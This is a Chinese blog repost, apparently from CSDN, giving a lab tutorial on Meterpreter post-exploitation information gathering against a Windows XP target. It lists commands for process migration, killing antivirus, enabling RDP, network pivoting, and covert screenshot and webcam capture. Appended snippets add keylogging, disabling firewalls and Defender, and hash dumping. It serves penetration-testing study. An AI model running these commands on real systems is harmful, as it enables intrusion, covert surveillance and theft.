Meterpreter后渗透之信息收集

最新推荐文章于 2023-05-25 18:40:47 发布
最新推荐文章于 2023-05-25 18:40:47 发布
阅读量220 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: shell 操作系统 运维
原文链接:http://www.cnblogs.com/-qing-/p/10509097.html
本文详细介绍使用Meterpreter进行后渗透阶段的信息收集方法,包括进程迁移、系统命令使用、文件系统操作等,适用于Kalilinux环境下针对XP靶机的操作。

在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础

记录一下关于meterpreter 信息收集的使用

环境: kali linux 192.168.190.141

       xp靶机 192.168.190.140

生成木马 监听反弹shell上线

 

 

 

 

信息收集:

 

 ========================================================================================================================

0x01进程迁移:

ps命令获取目标正在运行的进程:

 

getpid命令查看 meterpreter shell的进程号:

 

 可以看到pid为488 进程名为win.exe

使用migrate命令 进行shell的进程迁移:

成功迁移到pid为768的explorer.exe进程中。

迁移后原shell的进程(pid为488)会自动关闭,没有关闭也可以输入kill指令关闭 kill 488 

也可以使用自动迁移进程命令:

run post/windows/manage/migrate

 

 

 

 

0x02 系统命令

获得稳定进程后,接下来收集系统信息。

sysinfo查看目标系统信息

 

 查看是否是虚拟机 run post/windows/gather/checkvm

 

idletime命令查看目标机最近运行时间:

 

route命令查看目标机完整网络设置:

 

 

 

getuid获得用户名和计算机名称

 

run post/windows/manage/killav 命令关闭杀毒软件

 

run post/windows/manage/enable_rdp 开启3389

 

 run get_local_subnets 查看目标机本地子网情况

在meterpreter 会话上直接添加去往目标网段的路由

run autoroute -s xxxxx

查看路由添加情况 

run autoroute -p

枚举当前有多少用户:

run post/windows/gather/enum_logged_users

 

screenshot命令抓取主机屏幕截图:

webcam_list 查看目标机是否有摄像头;

webcam_snap命令打开摄像头,拍一张照片

webcam_stram命令开启直播模式

 

shell命令进入目标机shell;

 

 exit停止meterpreter会话 也可以用于shell返回meterpreter会话。

 

 

 

 

文件系统命令

pwd或者getwd查看shell处于的目标

 

getlwd 查看当前处于本地哪个目录

 

 cd 切换目录 search搜索文件 例如 search -f *.txt -d c:\\

 

download 命令下载文件

upload命令上传文件

 

转载于:https://www.cnblogs.com/-qing-/p/10509097.html

渗透测试常用工具-使用meterpreter模块进行后渗透测试
旺仔Sec&blog
10-24 1644
再然后使用命令keyscan_start对键盘进行监听,使用命令keyscan_dump保存截获的键盘信息(注:windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。第五步,使用info windows/meterpreter/reverse_tcp命令来查看攻击载荷模块的具体信息,该模块适用于Windows x86平台不需要admin权限便可以运行,大小为281字节,需要配置三个参数分别为退出的方式、监听的地址、监听的端口号、EXITFUNC。
Metasploit学习笔记(四)——Meterpreter渗透信息搜集
Zichel77的博客
10-07 1801
此时就需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令,就可以抓取此时目标机的屏幕截图。在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有。所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。利用前面永恒之蓝的步骤一模一样,就可以进到后渗透的步骤meterpreter,前面的详细步骤参考。
渗透测试-[Meterpreter渗透25招]
m0_43405474的博客
05-07 3528
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
meterpreter渗透阶段的基本操作(一)
zwish的信安之路
12-28 1628
这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题 1、shell里的中文乱码 获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码 解决方法:在输入shell之后,再输入chcp 65001 2、提权相关的问题 getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用全部提权方法)会报错,不成功、 (提权方式:1、g...
Meterpreter渗透模块之信息收集
sGanYu
09-23 2445
进程迁移 防止进程被用户关闭,移动shell 1)手动 先使用ps查看目标正在运行的进程 查看当前进程号 meterpreter > getpid Current pid: 1104 从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter > mig
Windows网络服务渗透测试实战-Meterpreter渗透
c_lanxiaofang的博客
05-17 2899
一、实验项目名称 Windows网络服务渗透测试实战-Meterpreter渗透 二、实验目的及要求 掌握对MS17-010漏洞攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 三、复现步骤(附加文字说明加截图) 1、查看系统信息 屏幕快照 上传 下载 密码获取 Administrator:500:aad3b435b51404eeaad3b...
Meterpreter渗透模块命令字典
m0_57221101的博客
04-14 853
一.系统命令 1.快捷操作 此板块用于记录用于操作meterpreter的指令 sessions #查看全部会话 –h 查看帮助 sessions -i <shell ID> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 2.基础系统命令 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系
渗透meterpreter学习笔记
迷风小白
11-08 8120
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 Meterpreter是Metasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
meterpreter渗透
04-07
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取...
metasploit后渗透信息收集
weixin_43152809的博客
12-27 294
渗透工具:meterpreter 该工具具有多重功能,使后续的渗透变得更加容易 获取目标机的meterpreter shell后,就进入了后期渗透利用阶段 后期渗透模块有200多个 meterpreter优势: 纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用 meterpreter反弹shell方法 进程迁移 刚获得meterpreter shell时,该shell极其脆弱并且易受攻击
meterpreter--收集系统信息
weixin_30835649的博客
04-25 227
一:收集目标机系统信息 sysinfo 二:检查目标机是否运行在虚拟机上 run post/windows/gather/checkvm ​ 三:目标机最近运行时间 idletime ​ 已运行8小时45分钟7秒 四:查看目标机渗透成功的用户名 getuid ​ 五:关闭安全软件 run post/windows/manage/killav 六:开...
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4787
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
渗透通过meterpreter模块提权
bring_coco的博客
11-06 1088
继上一篇得到的普通session进行提权 提权方法: 一.提高程序的运行级别(uac) 说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高权限的shell Msf模块: Exploit/windows/local/ask 1.试试看可不可以直接得到system权限 发现有报错 2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要提权的session 此
Metasploit(2) 渗透测试之信息收集
weixin_41182861的博客
07-23 771
基于 TCP 协议收集主机信息 基于 SNMP 协议收集主机信息 基于 SMB 协议收集信息 基于 SSH 协议收集信息 基于 FTP 协议收集信息
Meterpreter命令详解
热门推荐
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
MSF 下域内渗透
A_991128a的博客
03-15 400
先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
msf拿下windows的远程桌面
mulincong的博客
05-25 1078
msf拿下windows的远程桌面
mesploit后渗透测试阶段常用命令
星落的博客
05-24 1万+
1.关闭windows防火墙(需要管理员或system权限) netsh advfirewall set allprofiles state off 2.关闭windefend net stop windefend 3.关闭Bitlocker磁盘加密 manage -bde -off C: manage -bde -status C: 4.关闭DEP bcdedit.exe /set {current} nx AlwaysOff 5.杀死放杀毒软件 run killa..
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 1万+
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值